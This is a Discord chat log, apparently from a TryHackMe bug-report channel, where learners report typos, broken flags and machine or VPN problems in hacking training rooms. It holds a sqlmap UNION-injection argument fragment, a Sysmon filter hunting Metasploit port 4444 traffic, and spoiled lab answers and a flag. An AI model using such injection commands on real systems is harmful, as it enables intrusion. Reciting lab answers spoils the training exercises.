Fixed, thank you for reporting. 🙂

Gave +1 Rep to @soft terrace

Found another text bug - https://tryhackme.com/room/introtoshells intro to shells room, task 4. "Explaining this is outwith the scope of the room." should be "Explaining this is out of scope for the room." : Also if possible - please link to information when claiming out of scope so we can follow up if we don't know and want to know.

Nope, outwith is a word

This has come up before, Muirland is a Scot and is allowed

it's still horrible english and bad form for training materials.

Speak for yourself smh

I'm a Scot -- it's a common part of Scots vocabulary

Sure, but regional dialects are not appropriate for training materials. (Something I should know with my experience teaching English as a second language)

In that case the Americans are screwed -- Americanisms are one big regional variation of English

lol I don't disagree

I mean, googling the world in the U.S. does get you the definition, so it's not some secret

Just saying that it would be more understandable and better quality with the change to more standard terms.

And the end of the day, it's muir's room and he can do what he wants

I suspect the Americans may also disagree with you

I dislike the idea of stripping the character out of rooms in that way

Hell, Offsec materials are written in American English -- I assume those are also poorly written?

The second point, however, is maybe worth it?

I'd imagine the same goes for INE, for that matter

Including/mentioning the material that's out of scope is probably a good idea

the ine materials are just garbage in general

Muiri ... honestly yeah... a lot of training material is pretty terrible

Heh, I'll ping TJNull if you wanna say that to his face? 😆

Tis all good - consider it an improvement suggestion. I think it would be cool to see THM gain more traction and be considered the defacto training solution.

It would, but it can do that quite nicely with some of us writing in American, some us writing in Scots, and absolutely no one writing in Queen's English

haha aye, no one needs that pompous stuffy crap

I complained about the very same thing, and got the very same response. But we love Muiri , and he makes awesome rooms, so as James said, he can kinda do what he wants 🙂

I too, would like extra context on lots of stuff though. Usually I google or read man pages or whatever, but the quality is hit or miss at times

I just wish we had a disclaimer at the top of Muiri rooms so I could read all the text in a Scottish accent. But that suggestion hasn't been implemented yet

It is less common in modern usage, but not regional. It is perfectly fine in US English, British English, and General English. 🙂

Hello i'm trying to solve Windows PrivEsc but when connecting using RDP its not connected

I have tried on Both linux and windows and no connection

Are you connected through the openvpn?

yes

Shouldn't it be will?

That's not a bug I guess.

Or is it?

Not a bug but the room channel hasn't been made yet and most of the time, room spelling errors come here :) @wheat fractal

Oh okay.

Typos in rooms go here too

I cant submit answer in Task 6 question 3 at MITRE room.
I'm trying to submit correct answer and always receiving errors.

For the second name you find, what tool is it a part of?

I've added this as a Hint to Task 6 Question 3. 🙂

Hiya folks, not sure if this has been mentioned before, but I'm working through the OWASP Top 10 room and Task20 makes use of a XSS playground web app that's super laggy. The page doesn't seem to load completely and navigating to the stored-xss page won't load a comments section so the stored-xss tasks can't be completed.

Hello guys, i'm doing the https://tryhackme.com/room/uploadvulns and i've done the steps for setting the /etc/hosts but in my attacker box i can't load the sites with uploadvulns.thm; however with a command like firefox http://overwrite.uploadvulns.thm it seems to work but i can't acces the demo one. I have added it in the /etc/hosts file too. Is it normal with the attacker box ( with firefox on kali it won't load and with command line it works for 2/3 only). I have also tried with openvpn and the /etc/hosts of my windows computer it won't find the pages. Is the room bugged or am i doing something wrong ? (I followed the recomandations in the room to the point) Thank you in advance 🙂

It doesn't work on my kali vm either 😦

Pretty sure the room explicitly says that demo.uploadvulns.thm doesn't exist and not to navigate to it

dang i'm stupid 😂 Sorry. My bad. Thanks. I should stop doing those in parallel my classes I seem to become stubborn !

Np 🙂

Can you make that bold as well?

Aye

And 100x bigger?

I repent for my stupidity.
I carefully read it
And acknowledged, noded
And immediatly forgot 🤣

I do that all the time tbh

Room: https://tryhackme.com/room/thecodcaper
Task 6
Bug: LinEnum is written in 2 ways.

Same room
Task 7
Bug: shouldn't it be "than" instead of "then"?

There is bug in /introtoresearch : https://cdn.discordapp.com/attachments/830209597553639434/840684761986760714/unknown.png

seems fuelCMS in the db has changed to "fuel CMS"

Fixed 👍

hello
[01:07]
touch noot.txt
[01:07]
./shiba1
[01:08]
bash: ./shiba1: No such file or directory
[01:08]
pwd = /root
[01:09]
root@ip-10-10xxxxxx:~# find shiba
find: \u2018shiba\u2019: No such file or directory

In room linuxprivesc, the 'locate' command fails because the locatedb is out of date.

You are not on the correct machine. You're using the attackbox atm.

hey guys, I am doing a recording of room blaster. but I found there is no broswer history in that IE browser 😢

Known issue. Dark marked it as WontFix.

oh okay

tyty

I think maybe its good to add it in the box if possible

hehe

Only the creator can do that, dark is quite busy.

okay gotcha

thanks tho!

https://tryhackme.com/room/jupyter101
Task 2 - The supporting material link sends you to https://oldblog.cmnatic.co.uk/posts/thm-room-jupyter101-support-material/ which is a 404 page

network services task 6 section

@livid rose not a bug, you have the wrong machine deployed

(i lol'd at myself) thank you!

Gave +1 Rep to @eternal summit

Thanks fixing (:

oof I don't think I have a backup of that from when I started

I'm in the https://tryhackme.com/room/webenumerationv2 atm, ("There's a flag out there that can be found by directory scanning! Find it!") copy pasted the flag without the first letter and it got accepted...

¯_(ツ)_/¯

@obtuse musk that will be the answer tolerance :)

LOL

not really a bug but this room: https://tryhackme.com/room/csp, task 3

http is bolded to bring attention the the fact it's using a different protocol, so subdomain. and .org should also be bolded imo

Alfred room, Task 1 there is a bug with the first question

without filling in a answer it accepts it

Reload the page @wheat fractal

ahw check, that worked! @placid abyss . Thanks

Gave +1 Rep to @placid abyss

Hi Guys,

i'am not sure if it is a Bug, but in my opinion it is. I'am in the Beginner Path in Network Services at Task 6 . The the question six is " Based on the title returned to us, what do we think this port could be used for?" And the "correct" answer is " S Backdoor", but i think here is the Bug. The correct answer should be "Skidy's Backdoor". It looks like here is the problem with the missing " Skidy' " (hopefully it is understandable what i mean, english is not my nativ language)

Cheers

SG

Sorry if i see it correctly this belongs to the bugs room here, sorry.

Refresh the page. I think the correct answer is just "backdoor"

ok but the Field in the answer section is also * ******

and it acpeted S Backdoor , but i know what you mean and make sense to me

the answer fields allow for a certain amount of error. If you refresh the page, it should show the true/correct answer

ok thanks 😉

you're welcome

Hello, I have a problem with the first task file from the John the Ripper room. I think it is corrupted because I cannot open it, other task files from the room seem to work. I tried to cat the contents and it's totally not readable. Does anybody have the contents of the task file at hand and can send it to me?

What's the file called? @wheat fractal

There's a bug with THM atm where the file names are removed and you get just the extension

when I download it it;s called zip

but the others in the room are downloaded with the name 'txt'

and they work

Yeah. So rename it to file.zip

ok, thanks!

Gotta start somewhere 🙂

A txt (Or commonly a filename ending with .txt) is generally a txt file - Which means its readable - Like a book.
A zip (Or commonly a filename ending with .zip) is generally a compressed file - Which means its got all the data squished together in a form you wont be able to read - So you need to unzip it. Other compressed (Or archived) extensions are commonly .rar, .tar, .7z, .gz

When you're more experienced you'll be able to use the file header to see what type of file it is, even with no extension

There's a site bug atm, it's annoying

Also the file command is good

I've forwarded the Task File name issue. 🙂

Hi. The answer to the first question in https://www.tryhackme.com/room/dailybugle is spelled differently (without -) in tha answer than on the machine

Refresh your page and check again?

https://tryhackme.com/room/httpindetail Task 7, first question: answer expected has 23 characters, given flag has 21 characters, thus, the flag given is not correct

Hey @coral barn that’s a private room :)

As private rooms aren’t accessed by the majority of people, the bugs are up to the room creator to change.

It looks like the room hasn’t been released so it’s not as important yet

Ok, I understand. Thank you for the response @hazy tiger

Gave +1 Rep to @hazy tiger

Yes, after refreshing it is spelled in one word. I spelled it with a space, which the page accepted, but on the server its consequently spelled with "-" and that is not accepted by the THM page

Same problem here

how did you accessed a private room and saw it's tasks?

The Correct answer is not accepting in https://tryhackme.com/room/httpindetail - Task 7 - Questions 1

I have the same bug

the room isn't released publicly yet, how did you all get the room code?

Probably in a learning path

From here to be specific.

oh there's a dns one coming

bye bye :yep:

(would like to point out that Detail has a capital in DNS but lowercase in HTTP)

there seems to be a bug with the Ice room when trying to exploit the machine. Several people have posted it on the thm forum and no one seems to have a solution. The exploit is supposed to create a session, but never does after completing the exploit.

The room hasn't changed, and it works for the majority of people. Usually, the issue is that people have incorrect options.

Not really a bug, just a graphical issue. The new DNS in detail room- tasks 2 and 3, have a background color specified for the text, which looks odd with dark mode plugins. The other tasks look fine.

Hey yo, In the new room : httpindetail, a flag isnt working i think. Task :Make a GET request to /room

it says that the flag is wrong

room: https://tryhackme.com/room/httpindetail

Should also be you're

Honestly disappointed at that grammar

The flag for Task 7 Question 1 doesn't seem to work
The flag it gives is typo'd (Missed an E)

... Aaah - You beat me :p

We're aware of the discrepancy for the HTTP in Detail room for Task 7, Question 1. 🙂

THM{YOUR_ARE_IN_THE_ROOM} this doesn't work

Yeah.

But grammatically it should be you're

I wasn't arguing with the flag not working.

ahw gotcha, it works now

; )

Not really a bug per se, but the new httpindetail room doesn't mention a key distinction between put and post, which is idempotence.

also, task 4 background colors are hard to read with dark mode plugins.

Hey guys, the "Sysinternals" doesn't work for me. I cant make \live.sysinternals.com\tools<toolname> working. I'm following all the steps like getting the service Webclient Running, Install-WindowsFeature WebDAV-Redirector –Restart but it seems like I can't turn on the Network Discovery. When I turn it on and save, it looks like it goes back to "off" for my profile.
When I then try again "\live.sysinternals.com\tools\procmon.exe" it says "cannot find network path" like I don't have any network connection. I "RDP" the machine to access .

In the "Cutting out the noice" part of the "Sysmon" room there is a "4" missing in this command "Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=444'" (the text before says 4444 not 444)

A bit later in the same room in the "Hunting Metasploit" there again is an inconsitency with 444 and 4444

Hey, in room osquery, Under Creating Queries Task, the question was asking where the username length is 3 was not showed in the answer

Also in the next task. I think we need to run sudo with

Hello, I'm doing the splunk room. The splunk machine doesn't start. I tried several times and waited more than 5 minutes.

how did you get dark mode?

Web Fundamentals: Task 3, Question 1 accepts an incorrect answer

Please elaborate

It accepts "pos"

That's not a bug with the room

That's a bug with THM.

Ah right

Refresh the page. It's just answer tolerance

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @raven linden

Fixed those as well.

why am i getting "connection timed out " in almost all rooms

Probably because you are not connected to the VPN

Hey, on the room https://tryhackme.com/room/introtonetworking, the question "Which city is the registrant based in?" in task 7 has changed

I don't think it has. Make sure you change domain when the room tells you to.

The city is asking for the city associated with microsoft.com not facebook

ho ok, I missed the previous question 😅 my bad

There is a problem in the following room:

https://tryhackme.com/room/webosint

Task 2.5 - What country is listed for the registrant?

https://rdap.namecheap.com/domain/REPUBLICOFKOFFEE.COM

Using this link, we can see that the registrant's country code is IS.
However, iceland does not work in response.

After reading the writeup, the expected answer is panama! I think there is a problem, either in the domain name or in the expected answer.

Iceland?

Yes sorry ! Iceland. I have modified my report

I think this has been reported and the room creator said something about it, hold on a sec

Certainly been reported a few times

@eternal summit i was connected to it

tried to restart it too

https://tryhackme.com/room/wreath, task 9

to -> on

https://tryhackme.com/room/wreath, task 9

i think this question could be worded like DNS servers or DNS resolvers rather than entries since DNS entries typically refer to DNS records (A, AAAA etc.) which would be your /etc/hosts

Heyo, I think there's an error/typo in the John the Ripper room in the beginner path. It seems to swap P and NP in the explanation https://i.imgur.com/NkYme3x.png so they have the backwards meaning

<@&568449888682246145> Vulnversity room is not loading!!! Trying from yesterday

Please do not ping the admins.

is the metasploit room loading for anyone?

Oh k sorry!
How to resolve that issue??

Is there something wrong with attacktive directory?

maybe doesn't work with the latest impacket?

secretsdump.py DRSUAPI fails

I'd recommend asking in #room-help

It's not going to be bug with the room, but perhaps some of the tools have changed.

In the volatility room it says "On Debian-based systems such as Kali this can be done via 'apt-get install volatility' but kali has dropped volatility repos and you wont be able to apt-get it without adding repos.

@heavy spade

well that's annoying lol

Thank you for reporting that!

np

@dusky junco can I text you in private?

so in buffer overflow prep, instructions say to run exploit.py with python3 but it only works with python,,, ???

Hello everyone

Any news on Rust room?

Room doesn't work more than 2 weeks

Can anyone please reach out to "bee" user regarding this?

It's a site issue not a room issue

hi, I just finished the Overpass 3 room and the first flag should be own by apache but it's a root flag is it normal ?

It is world readable. Not a bug.

https://tryhackme.com/room/howwebsiteswork, task 1

needs a comma after website

task 2 should also probably have the highlighted text in a code block thingy like the rest

Fixed. Thank you for reporting Jake. 🙂

Gave +1 Rep to @sonic willow

but the hint was that it belong to apache and there it belong to root right ?

Belongs doesn't always mean the owner

It's belongs in a non-linux sense

ok my misunderstanding 🙂

tiny proofreading thing - in https://tryhackme.com/room/introtonetworking , I think the following were meant to make ".com" and ".co.uk" bold, but the formatting failed: "if you were searching for tryhackme**.com** ... If you were searching for bbc**.co.uk**

Ta. We briefly changed to a markdown editor before Christmas and a bunch of the formatting went nuts when we switched back. Fixing now

Is the Vulnversity room down by any chance?
I just cannot access it.
Whereas other rooms and machines are responding well, why and what is the reason Vulnversity isn't accessible to be?

me*

Rooms can't be down

It's a site bug atm

Admins are aware. They're working on it.

In the Blaster room, the first question in Task 3 doesn't seem to be answerable anymore (at least not in the way shown in the official walkthrough) as Internet Explorer is set to delete its history after 20 days

It's been closed as wontfix

You can find the cve via the file.

hello everyone. I am just working on "Internal". The internal wordpress site does not work properly. Many links are down and logging in is not possible. I also tried it with the provided AttackBox, same result.

@craggy swift I would put money on you not adding it to your hosts file, in which case it's not a bug. That's just how WordPress responds to being accessed from the wrong domain

Ok, but then maybe the hint should be changed. It is quite misleading saying "Sometimes looking at the history in a user's web browser can be very insightful"

Again. Closed as wontfix.

Ah, quite disappointing. Is this a general strategy in THM? Just ignoring bugs?

No.

It's an incredibly small issue in a challenge room that's worked around very easily.

Yes, I agree that the issue itself is small but the hint is explicitly misleading. I just have to decide if I still want to waste money on THM, if this is the reaction I get when pointing out bugs.

Remember that many rooms are created by community members

Also remember that the discord is not official support.

Yes, I mainly am dissatisfied with your answers. If the answer would have been: "We know it is broken, but it won't be fixed, because it isn't worth the effort" that might have been fine. But I clearly got the message, that I shouldn't point of bugs, that can be worked around

I'm not official support either.

You're free to be dissatisfied with my answers because I'm under no obligation to provide satisfactory answers, as a volunteer.

You should point out bugs. You just cannot expect every single thing to be fixed. Room creators are often working or studying full time in addition to creating rooms.

I have full understanding for that. I just got in doubt if I should point out bugs. Thank you for the explanations

Yes, please do. User feedback is really important to TryHackMe. 🙂

Thank you. And sorry for me sounding irritated above. I appreciate all the work you (both staff and volunteers) do to provide interesting challenges :)

Gave +1 Rep to @glad badger

https://tryhackme.com/room/relevant the webserver is not accessible from this room....although SMB share is working

I think you need to add it to /etc/hosts?

Can you provide a little more detail than "not working"?

!docs verify

Follow these steps so that you can post screenshots

I have shared the image as i was unable to copy paste here

Yeah. Follow those steps to verify and then you will be able to post images.

ok thx

the webserver is not up in the box...thx

Not all boxes have web servers. But try it without the https, just http

Also a portscan

i cant solve one question of attacking kerberos....i mean i solved it but it says not correct....i checked write ups,blogs,videos the ans is correct but its not accepting it

Please do not spam the same thing over multiple channels.
Please provide more context to your statement.

got stuck with scan itself...any reasons for ports being filtered..thx.. https://tryhackme.com/room/relevant

Yeah. Fix your VPN.

is it because i am getting connected through mobile hotspot???

IDK, I just know your VPN probably isn't correctly functional

I recommend going to #site-support

thx a lot

I think this may be a bug - doesn't require answer. XXE: Task 5.

It's a question to get you to think about it

https://tryhackme.com/room/rust

This room is stuck on loading.

Site bug, not a room bug

The admins know

oh okay, got it

thank you @tall nexus for the Linux Strength Training room 🙂 fun way of drilling in things I've had to look up for years every time I needed to use them

Gave +1 Rep to @tall nexus

very minor thing: Task 4 question 2, the [MACHINE:IP] markup doesn't auto-replace (I'm not dreaming, it does that in other rooms, right ?)

MACHINE:IP sounds like a typo

MACHINE_IP should autoreplace but I've seen it being a bit weird around special characters

Kenobi has a few instances that don't auto-replace, but I don't think they were designed to

This one got me too- syntax is everything! What I learned here is unless you are running as root for everything on your system, you will run into permission issues like this one unless you use sudo or switch to root to run the command. Also adding the '-debug' flag at the end of command lines can really help you sort out the problem.

yup after i posted I found the same thing

Great! it's a crazy world we live in when chasing syntax errors can take hours or days! But what choice we have- quit? Never!!

Hey folks, anyone could explain me the points system!? I read about them, but I'm a bit confused when a I see the following....

On Pickle Rick room...

This is 799 days old, but there is a guys that made this room the last 25th of April and received 80 points per answer, there are other guys that made the room at the same day but received 30 points per some answers and finally I received only 30 points per answer on my all answers.

So, could any one explain me why this differences!? I guessed that this room is so old, that all of us would receive 30 points, or am I wrong!?

Thanks in advance!

It's a challenge room so whoever answered it first got an increased point value

Thanks!! but is it work even with old challenge rooms!? I guessed that happened with newest rooms that were released in the same month. Or am I wrong!?

Gave +1 Rep to @viral cobalt

https://tryhackme.com/room/rust
this room is not opening
stuck on the loading screen

You are wrong. The points persist. The first person to answer a question in a challenge room that has blood points enabled is awarded an extra 50 points. These points do not go away after time.

Is the room Daily Bugle down. I tried pinging and not getting any response also. Tried restarting the machine 2 times but the problem persists.

Anyone, any idea?

https://tryhackme.com/room/dailybugle

Rooms cannot be down as the VMs are not shared

Usually, this means a VPN issue.

I would recommend heading to #site-support

Ok thanks @eternal summit

Gave +1 Rep to @eternal summit

PSEXEC works on vulnnet roasted when not a subscriber, but does not work when you are one. Not sure what the issue is, but a non subscriber told me psexec is working every time, but for me as a subscriber it’s not working at all. Command syntax is the same, and scenario is identical.

in the https://tryhackme.com/room/investigatingwindows the question "At what date did the compromise take place?" asks for a format of "Answer format: MM/DD/YY" but it won't work unless you give it a format of MM/DD/YYYY

the answer is ||03/02/2019|| if anyone wants to confirm

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @misty cave

Task 7 On the OWASP juice shop is not working for me. I am getting the pop up to hit okay, but afterwards I am not getting the flag. Has anyone else encountered this? It is not even letting me select them being completed on score-board page.
NEW

Good evening, Yara room Task 11 last question hint has a typo in the hint which could lead to some frustration 😄

it should be thor-webshells.yar and not thor-webshell.yar

Just wanted to share to possibly help anyone else going through the room and trying to use "locate" to find the file lol

Heyo, I found an extra space in the code for the sqlilabp3 room.
Under task 7 after the automated script.
https://tryhackme.com/room/sqlilab
P5 informational thank you. o3o

-p username --dbms sqlite --technique=U --no-cast```

there is a minor bug in https://tryhackme.com/room/owasptop10 , task 14 [Severity 4] XML External Entity - DTD ,
in second to last line: !ELEMENT body - Defines the body element to be of type "#PCDATA"
element is highlighted but body should be as in the case of the preceding 3 lines

Need to update on: https://tryhackme.com/room/wireshark

Old: RSA key navigate to Edit > Preferences > Protocols > SSL > [+], you will need to fill in the various sections

Needs to update SSL to TLS. SSL isn't listed in current verison on wireshark anymore.

Room : https://tryhackme.com/room/rpwebscanning
Task 2 : Question 6
Nikto spelling is wrong.
just typo but should be fixed looks awkward to me

For Internal room (https://tryhackme.com/room/internal), I not sure if this is considered a bug... but when trying to crack the password for Jenkins, my hydra in attackbox is yielding different results from my own kali vm connected through openvpn.
Attackbox keeps returning superman as the password while my own kali vm gives the correct password.

In https://tryhackme.com/room/attacktivedirectory task 6, i assume there is a missing which

https://tryhackme.com/room/rrootme this CTF constantly hangs or times out 😦

the whole room is going to be redone at some point

it's on my to-do list

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @rustic snow

why invalid user ?

Fixed. Thank you for reporting. 🙂